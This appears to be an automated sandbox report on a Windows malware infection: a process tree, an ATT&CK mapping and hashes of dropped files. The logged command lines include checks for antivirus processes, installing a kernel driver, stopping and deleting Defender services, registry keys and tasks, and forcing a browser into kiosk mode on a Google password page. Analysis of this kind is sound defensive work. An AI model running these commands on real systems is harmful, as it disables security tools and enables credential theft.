C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Leon.cab9⤵
- System Location Discovery: System Language Discovery
PID:2468
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "BEVERAGES" Compilation9⤵PID:2740
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 418377\Passwords.com + Playing + New + Realized + Uw + Jpeg + Badly + Asbestos + Seeds + Service + Basis + Via 418377\Passwords.com9⤵
- System Location Discovery: System Language Discovery
PID:1252
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Pendant.cab + ..\Visitor.cab + ..\Illegal.cab + ..\Suddenly.cab + ..\Theology.cab + ..\Kidney.cab + ..\Flying.cab + ..\Tigers.cab N9⤵PID:2916
-
-
C:\Users\Admin\AppData\Local\Temp\418377\Passwords.comPasswords.com N9⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:348
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 59⤵
- System Location Discovery: System Language Discovery
PID:940
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10341320101\TbV75ZR.exe"C:\Users\Admin\AppData\Local\Temp\10341320101\TbV75ZR.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:1448 -
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat8⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
PID:1628 -
C:\Windows\SysWOW64\tasklist.exetasklist9⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2640
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"9⤵
- System Location Discovery: System Language Discovery
PID:2084
-
-
C:\Windows\SysWOW64\tasklist.exetasklist9⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:2624
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"9⤵
- System Location Discovery: System Language Discovery
PID:1220
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 2679789⤵
- System Location Discovery: System Language Discovery
PID:1916
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Spanish.vss9⤵
- System Location Discovery: System Language Discovery
PID:1068
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "East" Removed9⤵PID:3060
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 267978\Exam.com + Vermont + Conflict + Remarks + Safer + Districts + Eddie + Awful + Garage + Sexually + Mitsubishi + Freeware 267978\Exam.com9⤵
- System Location Discovery: System Language Discovery
PID:1792
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Austin.vss + ..\Canal.vss + ..\Cottage.vss + ..\Engineers.vss + ..\Racks.vss + ..\Spy.vss + ..\Weekends.vss + ..\Shirt.vss + ..\Fields.vss + ..\Flyer.vss + ..\Strengthening.vss + ..\Floors.vss j9⤵PID:1508
-
-
C:\Users\Admin\AppData\Local\Temp\267978\Exam.comExam.com j9⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3056
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 59⤵PID:1064
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10341330101\f73ae_003.exe"C:\Users\Admin\AppData\Local\Temp\10341330101\f73ae_003.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2176
-
-
C:\Users\Admin\AppData\Local\Temp\10341340101\WLbfHbp.exe"C:\Users\Admin\AppData\Local\Temp\10341340101\WLbfHbp.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
- Drops file in Windows directory
PID:2328 -
C:\Windows\SysWOW64\CMD.exe"C:\Windows\system32\CMD.exe" /c copy Edit.vss Edit.vss.bat & Edit.vss.bat8⤵
- Loads dropped DLL
PID:1612 -
C:\Windows\SysWOW64\tasklist.exetasklist9⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:1596
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"9⤵
- System Location Discovery: System Language Discovery
PID:3064
-
-
C:\Windows\SysWOW64\tasklist.exetasklist9⤵
- Enumerates processes with tasklist
- Suspicious use of AdjustPrivilegeToken
PID:2316
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SophosHealth bdservicehost AvastUI AVGUI nsWscSvc ekrn"9⤵PID:236
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 2679789⤵PID:3052
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Spanish.vss9⤵PID:2332
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 267978\Exam.com + Vermont + Conflict + Remarks + Safer + Districts + Eddie + Awful + Garage + Sexually + Mitsubishi + Freeware 267978\Exam.com9⤵
- System Location Discovery: System Language Discovery
PID:1136
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b ..\Austin.vss + ..\Canal.vss + ..\Cottage.vss + ..\Engineers.vss + ..\Racks.vss + ..\Spy.vss + ..\Weekends.vss + ..\Shirt.vss + ..\Fields.vss + ..\Flyer.vss + ..\Strengthening.vss + ..\Floors.vss j9⤵
- System Location Discovery: System Language Discovery
PID:1616
-
-
C:\Users\Admin\AppData\Local\Temp\267978\Exam.comExam.com j9⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Loads dropped DLL
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2052
-
-
C:\Windows\SysWOW64\choice.exechoice /d y /t 59⤵PID:408
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10341350101\84648d4c83.exe"C:\Users\Admin\AppData\Local\Temp\10341350101\84648d4c83.exe"7⤵
- Executes dropped EXE
PID:1712 -
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 1712 -s 648⤵
- Loads dropped DLL
PID:2320
-
-
-
C:\Users\Admin\AppData\Local\Temp\10341360101\apple.exe"C:\Users\Admin\AppData\Local\Temp\10341360101\apple.exe"7⤵
- Executes dropped EXE
- Loads dropped DLL
PID:684 -
C:\Users\Admin\AppData\Local\Temp\11.exe"C:\Users\Admin\AppData\Local\Temp\11.exe"8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:696 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\43C4.tmp\43C5.tmp\43C6.bat C:\Users\Admin\AppData\Local\Temp\11.exe"9⤵PID:1444
-
C:\Users\Admin\AppData\Local\Temp\11.exe"C:\Users\Admin\AppData\Local\Temp\11.exe" go10⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: CmdExeWriteProcessMemorySpam
PID:1720 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\447F.tmp\4480.tmp\4481.bat C:\Users\Admin\AppData\Local\Temp\11.exe go"11⤵
- Drops file in Program Files directory
PID:740 -
C:\Windows\system32\sc.exesc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"12⤵
- Launches sc.exe
PID:2988
-
-
C:\Windows\system32\sc.exesc start ddrver12⤵
- Launches sc.exe
PID:1916
-
-
C:\Windows\system32\timeout.exetimeout /t 112⤵
- Delays execution with timeout.exe
PID:2008
-
-
C:\Windows\system32\sc.exesc stop ddrver12⤵
- Launches sc.exe
PID:1896
-
-
C:\Windows\system32\sc.exesc start ddrver12⤵
- Launches sc.exe
PID:3000
-
-
C:\Windows\system32\takeown.exetakeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y12⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2660
-
-
C:\Windows\system32\icacls.exeicacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t12⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:2532
-
-
C:\Windows\system32\sc.exesc stop "WinDefend"12⤵
- Launches sc.exe
PID:2840
-
-
C:\Windows\system32\sc.exesc delete "WinDefend"12⤵
- Launches sc.exe
PID:2560
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f12⤵PID:2272
-
-
C:\Windows\system32\sc.exesc stop "MDCoreSvc"12⤵
- Launches sc.exe
PID:2828
-
-
C:\Windows\system32\sc.exesc delete "MDCoreSvc"12⤵
- Launches sc.exe
PID:3048
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f12⤵PID:2884
-
-
C:\Windows\system32\sc.exesc stop "WdNisSvc"12⤵
- Launches sc.exe
PID:2880
-
-
C:\Windows\system32\sc.exesc delete "WdNisSvc"12⤵
- Launches sc.exe
PID:1792
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f12⤵PID:2336
-
-
C:\Windows\system32\sc.exesc stop "Sense"12⤵
- Launches sc.exe
PID:1984
-
-
C:\Windows\system32\sc.exesc delete "Sense"12⤵
- Launches sc.exe
PID:1376
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\Sense" /f12⤵PID:1964
-
-
C:\Windows\system32\sc.exesc stop "wscsvc"12⤵
- Launches sc.exe
PID:2708
-
-
C:\Windows\system32\sc.exesc delete "wscsvc"12⤵
- Launches sc.exe
PID:3064
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f12⤵PID:1652
-
-
C:\Windows\system32\sc.exesc stop "SgrmBroker"12⤵
- Launches sc.exe
PID:1960
-
-
C:\Windows\system32\sc.exesc delete "SgrmBroker"12⤵
- Launches sc.exe
PID:1060
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f12⤵PID:1568
-
-
C:\Windows\system32\sc.exesc stop "SecurityHealthService"12⤵
- Launches sc.exe
PID:1004
-
-
C:\Windows\system32\sc.exesc delete "SecurityHealthService"12⤵
- Launches sc.exe
PID:1508
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f12⤵PID:1500
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefsvc"12⤵
- Launches sc.exe
PID:236
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefsvc"12⤵
- Launches sc.exe
PID:2356
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f12⤵PID:3052
-
-
C:\Windows\system32\sc.exesc stop "webthreatdefusersvc"12⤵
- Launches sc.exe
PID:2332
-
-
C:\Windows\system32\sc.exesc delete "webthreatdefusersvc"12⤵
- Launches sc.exe
PID:1592
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f12⤵PID:2064
-
-
C:\Windows\system32\sc.exesc stop "WdNisDrv"12⤵
- Launches sc.exe
PID:1728
-
-
C:\Windows\system32\sc.exesc delete "WdNisDrv"12⤵
- Launches sc.exe
PID:2060
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f12⤵PID:1884
-
-
C:\Windows\system32\sc.exesc stop "WdBoot"12⤵
- Launches sc.exe
PID:552
-
-
C:\Windows\system32\sc.exesc delete "WdBoot"12⤵
- Launches sc.exe
PID:2176
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f12⤵PID:2712
-
-
C:\Windows\system32\sc.exesc stop "WdFilter"12⤵
- Launches sc.exe
PID:2444
-
-
C:\Windows\system32\sc.exesc delete "WdFilter"12⤵
- Launches sc.exe
PID:2424
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f12⤵PID:2548
-
-
C:\Windows\system32\sc.exesc stop "SgrmAgent"12⤵
- Launches sc.exe
PID:376
-
-
C:\Windows\system32\sc.exesc delete "SgrmAgent"12⤵
- Launches sc.exe
PID:888
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f12⤵PID:1980
-
-
C:\Windows\system32\sc.exesc stop "MsSecWfp"12⤵
- Launches sc.exe
PID:2440
-
-
C:\Windows\system32\sc.exesc delete "MsSecWfp"12⤵
- Launches sc.exe
PID:2292
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f12⤵PID:1096
-
-
C:\Windows\system32\sc.exesc stop "MsSecFlt"12⤵
- Launches sc.exe
PID:1628
-
-
C:\Windows\system32\sc.exesc delete "MsSecFlt"12⤵
- Launches sc.exe
PID:580
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f12⤵PID:1180
-
-
C:\Windows\system32\sc.exesc stop "MsSecCore"12⤵
- Launches sc.exe
PID:1448
-
-
C:\Windows\system32\sc.exesc delete "MsSecCore"12⤵
- Launches sc.exe
PID:1660
-
-
C:\Windows\system32\reg.exereg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f12⤵PID:808
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f12⤵PID:1132
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f12⤵PID:1440
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f12⤵PID:2156
-
-
C:\Windows\system32\schtasks.exeschtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f12⤵PID:1504
-
-
C:\Windows\system32\sc.exesc stop ddrver12⤵
- Launches sc.exe
PID:2392
-
-
C:\Windows\system32\sc.exesc delete ddrver12⤵
- Launches sc.exe
PID:1284
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10341370101\5792319151.exe"C:\Users\Admin\AppData\Local\Temp\10341370101\5792319151.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:1644
-
-
C:\Users\Admin\AppData\Local\Temp\10341380101\b6a245b7ee.exe"C:\Users\Admin\AppData\Local\Temp\10341380101\b6a245b7ee.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious behavior: EnumeratesProcesses
PID:2832
-
-
C:\Users\Admin\AppData\Local\Temp\10341390101\0596495a6d.exe"C:\Users\Admin\AppData\Local\Temp\10341390101\0596495a6d.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3048 -
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM firefox.exe /T8⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2768
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM chrome.exe /T8⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1996
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM msedge.exe /T8⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:2436
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM opera.exe /T8⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1568
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill /F /IM brave.exe /T8⤵
- System Location Discovery: System Language Discovery
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:236
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking8⤵PID:1592
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking9⤵
- Checks processor information in registry
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:2064 -
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2064.0.731660622\2040672125" -parentBuildID 20221007134813 -prefsHandle 1284 -prefMapHandle 1088 -prefsLen 20847 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {232423a8-3352-48d6-8363-fdb8c1414dc8} 2064 "\\.\pipe\gecko-crash-server-pipe.2064" 1356 103d8f58 gpu10⤵PID:1824
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2064.1.604034910\202633602" -parentBuildID 20221007134813 -prefsHandle 1556 -prefMapHandle 1552 -prefsLen 21708 -prefMapSize 233444 -appDir "C:\Program Files\Mozilla Firefox\browser" - {5c603d0b-05e9-419f-94d8-33b4539e5b2e} 2064 "\\.\pipe\gecko-crash-server-pipe.2064" 1568 f1eb258 socket10⤵PID:2420
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2064.2.1082916750\1649758128" -childID 1 -isForBrowser -prefsHandle 1904 -prefMapHandle 1900 -prefsLen 21746 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {24475975-a2e9-4d14-9c95-2b27be67b3d2} 2064 "\\.\pipe\gecko-crash-server-pipe.2064" 1916 19a54d58 tab10⤵PID:2392
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2064.3.588766082\1745134743" -childID 2 -isForBrowser -prefsHandle 2732 -prefMapHandle 2728 -prefsLen 26151 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d77e0f06-5d80-4b9c-b5d2-196bee1cb1cd} 2064 "\\.\pipe\gecko-crash-server-pipe.2064" 2744 1e222558 tab10⤵PID:2748
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2064.4.408728737\975211739" -childID 3 -isForBrowser -prefsHandle 3780 -prefMapHandle 3776 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {d8aca041-2dea-4539-973e-363ea928b179} 2064 "\\.\pipe\gecko-crash-server-pipe.2064" 3792 20014558 tab10⤵PID:2328
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2064.5.1083109482\87338555" -childID 4 -isForBrowser -prefsHandle 3904 -prefMapHandle 3908 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {fbc816a9-21ac-45c9-a2d2-5da07f469b60} 2064 "\\.\pipe\gecko-crash-server-pipe.2064" 3892 200f8b58 tab10⤵PID:2448
-
-
C:\Program Files\Mozilla Firefox\firefox.exe"C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel="2064.6.2049547544\829329289" -childID 5 -isForBrowser -prefsHandle 4080 -prefMapHandle 4084 -prefsLen 26351 -prefMapSize 233444 -jsInitHandle 564 -jsInitLen 246848 -a11yResourceId 64 -parentBuildID 20221007134813 -appDir "C:\Program Files\Mozilla Firefox\browser" - {58969c22-33eb-4857-935d-e499c27a71cb} 2064 "\\.\pipe\gecko-crash-server-pipe.2064" 4068 200fb258 tab10⤵PID:1444
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10341400101\aba3392099.exe"C:\Users\Admin\AppData\Local\Temp\10341400101\aba3392099.exe"7⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Modifies Windows Defender TamperProtection settings
- Modifies Windows Defender notification settings
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Windows security modification
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:1820
-
-
C:\Users\Admin\AppData\Local\Temp\10341410101\5c7ccbab54.exe"C:\Users\Admin\AppData\Local\Temp\10341410101\5c7ccbab54.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:3300
-
-
C:\Users\Admin\AppData\Local\Temp\10341430101\f601398bc7.exe"C:\Users\Admin\AppData\Local\Temp\10341430101\f601398bc7.exe"7⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
PID:3660 -
C:\Users\Admin\AppData\Local\Temp\svchost015.exe"C:\Users\Admin\AppData\Local\Temp\10341430101\f601398bc7.exe"8⤵PID:3844
-
-
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\267978\Exam.com"C:\Users\Admin\AppData\Local\Temp\267978\Exam.com"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:372
-
-
C:\Users\Admin\AppData\Local\Temp\10340730101\BIm18E9.exe"C:\Users\Admin\AppData\Local\Temp\10340730101\BIm18E9.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2140
-
-
C:\Users\Admin\AppData\Local\Temp\10340730101\BIm18E9.exe"C:\Users\Admin\AppData\Local\Temp\10340730101\BIm18E9.exe"2⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2724
-
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1System Services
2Service Execution
2Persistence
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
6Windows Service
6Scheduled Task/Job
1Scheduled Task
1Privilege Escalation
Boot or Logon Autostart Execution
1Registry Run Keys / Startup Folder
1Create or Modify System Process
6Windows Service
6Scheduled Task/Job
1Scheduled Task
1Defense Evasion
File and Directory Permissions Modification
1Impair Defenses
6Disable or Modify Tools
5Modify Registry
8Subvert Trust Controls
1Install Root Certificate
1Virtualization/Sandbox Evasion
2Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
779B
MD539c8cd50176057af3728802964f92d49
SHA168fc10a10997d7ad00142fc0de393fe3500c8017
SHA256f685edf8437c0b505f5e366d8b1cb79e7770361cc4906240e7f8c8ad32c94e84
SHA512cf563b2b5a3553acf3a91298936b904abf87620c2fc582bcdb45dec5d4b877bef5ae81feae4b741e1aee1a916e543b5f6914d9c494d2aa33bc6f15c6fc904cc6
-
Filesize
71KB
MD583142242e97b8953c386f988aa694e4a
SHA1833ed12fc15b356136dcdd27c61a50f59c5c7d50
SHA256d72761e1a334a754ce8250e3af7ea4bf25301040929fd88cf9e50b4a9197d755
SHA512bb6da177bd16d163f377d9b4c63f6d535804137887684c113cc2f643ceab4f34338c06b5a29213c23d375e95d22ef417eac928822dfb3688ce9e2de9d5242d10
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\n3lsnn48.default-release\activity-stream.discovery_stream.json.tmp
Filesize26KB
MD5e7fcbc69bd810ae48fecce2e7964bad3
SHA19c7fcd96aab041774b4d91535c85935cc914efbe
SHA2562c0c73858f26ad7591f51de656e219c1fa6862896a1224ab0905e758da891ebe
SHA512fcdd45b7720988f1b7c1e9430cdc5d76afecc382e5538940816927a52a2d6a4e49ec6520a3abeaf4ceef19c28c63302f2cb5cc0caad59bff3ea8dfb3aecb7d72
-
C:\Users\Admin\AppData\Local\Mozilla\Firefox\Profiles\n3lsnn48.default-release\settings\main\ms-language-packs\browser\newtab\asrouter.ftl
Filesize15KB
MD596c542dec016d9ec1ecc4dddfcbaac66
SHA16199f7648bb744efa58acf7b96fee85d938389e4
SHA2567f32769d6bb4e875f58ceb9e2fbfdc9bd6b82397eca7a4c5230b0786e68f1798
SHA512cda2f159c3565bc636e0523c893b293109de2717142871b1ec78f335c12bad96fc3f62bcf56a1a88abdeed2ac3f3e5e9a008b45e24d713e13c23103acc15e658
-
Filesize
1.8MB
MD5df504a29ad522d6eabe6258886d296bc
SHA170d007b95628877924e5a41cceabcba93bc46a80
SHA256c0472272fbb70a86f21f0b3f156a74e29c9cb3b9c56fefc5594e90879144d4b9
SHA5123c356a28dbc7bd1e3c3219cb6f1c55f8ed68702d8e814d9e4de47a0fdb1ebbbaeacc1d7375b157fba7cfaf2487e2a2adde26db121c6f1c5ea1d1c8ce5085ac79
-
Filesize
1.8MB
MD547b3f376188efdf744ce07f23cd8da94
SHA1fd29dab640191d853d8c9fd632514ea0a4cba0a8
SHA25643ffcbde001d60632d173e32239142ac13f00664858edf74208559ffb59a9d55
SHA512ed6c4b9cfbaa028d468884f8cdbef7340a4890610860c95df10354bd9026b02839df355eee8356e5c9f466f9e278bf9b3a43311c7fc9da6f11aa9cc4986e85f7
-
Filesize
1.4MB
MD549e9b96d58afbed06ae2a23e396fa28f
SHA13a4be88fa657217e2e3ef7398a3523acefc46b45
SHA2564d0f0f1165c992c074f2354604b4ee8e1023ba67cb2378780313e4bb7e91c225
SHA512cd802e5717cf6e44eaa33a48c2e0ad7144d1927d7a88f6716a1b775b502222cc358d4e37bdbd17ebe37e0d378bb075463bce27619b35d60b087c73925a44a6d4
-
Filesize
4.9MB
MD5c909efcf6df1f5cab49d335588709324
SHA143ace2539e76dd0aebec2ce54d4b2caae6938cd9
SHA256d749497d270374cba985b0b93c536684fc69d331a0725f69e2d3ff0e55b2fbc6
SHA51268c95d27f47eeac10e8500cd8809582b771ab6b1c97a33d615d8edad997a6ab538c3c9fbb5af7b01ebe414ddaeaf28c0f1da88b80fbcb0305e27c1763f7c971a
-
Filesize
938KB
MD553fa587748955bc09f4fb41190e2a7a2
SHA198b33c0cec873108ab110e629bb06395677f1b2a
SHA256db0be9d6888e82bf26bf94feb916fadd8362f14fd689efd4b56803a66eb6038e
SHA512e25e83715b34e36f6cae210af0d38e86ea0d927ca35ff62247eb400c82393e1c04a49143d779b7a66e51d5c38e44401dde2bfc26106676ed8d38f02bb5a0b84c
-
Filesize
1KB
MD5cedac8d9ac1fbd8d4cfc76ebe20d37f9
SHA1b0db8b540841091f32a91fd8b7abcd81d9632802
SHA2565e951726842c371240a6af79d8da7170180f256df94eac5966c07f04ef4d120b
SHA512ce383ffef8c3c04983e752b7f201b5df2289af057e819cdf7310a55a295790935a70e6a0784a6fd1d6898564a3babab1ffcfbaa0cc0d36e5e042adeb3c293fa5
-
Filesize
1.2MB
MD57d842fd43659b1a8507b2555770fb23e
SHA13ae9e31388cbc02d4b68a264bbfaa6f98dd0c328
SHA25666b181b9b35cbbdff3b8d16ca3c04e0ab34d16f5ebc55a9a8b476a1feded970a
SHA512d7e0a845a1a4e02f0e0e9cf13aa8d0014587ebef1d9f3b16f7d3d9f3dc5cdc2a17aa969af81b5dc4f140b2d540820d39317b604785019f1cbfa50d785970493b
-
Filesize
1.3MB
MD5eb880b186be6092a0dc71d001c2a6c73
SHA1c1c2e742becf358ace89e2472e70ccb96bf287a0
SHA256e4e368cac17981db7fbd37b415ee530900179f1c73aa7fad0e169fcc022e8f00
SHA512b6b9fad4e67df75c8eea8702d069cc1df0b8c5c3f1386bc369e09521cbf4e8e6b4c08102ceea5ca40509bf0593c6c21b54acf9b8c337bff6aa1f3afc69d0f96e
-
Filesize
1.1MB
MD596fa728730da64d7d6049c305c40232c
SHA13fd03c4f32e3f9dbcc617507a7a842afb668c4de
SHA25628d15f133c8ea7bf4c985207eefdc4c8c324ff2552df730f8861fcc041bc3e93
SHA512c66458fcb654079c4d622aa30536f8fbdef64fe086b8ca5f55813f18cb0d511bc25b846deec80895b303151dfe232ca2f755b0ad54d3bafcf2aec7ff318dbcbe
-
Filesize
327KB
MD5f0676528d1fc19da84c92fe256950bd7
SHA160064bc7b1f94c8a2ad24e31127e0b40aff40b30
SHA256493b897d1a54e3aa3f177b49b2529d07cdd791c6d693b6be2f9a4f1144b74a32
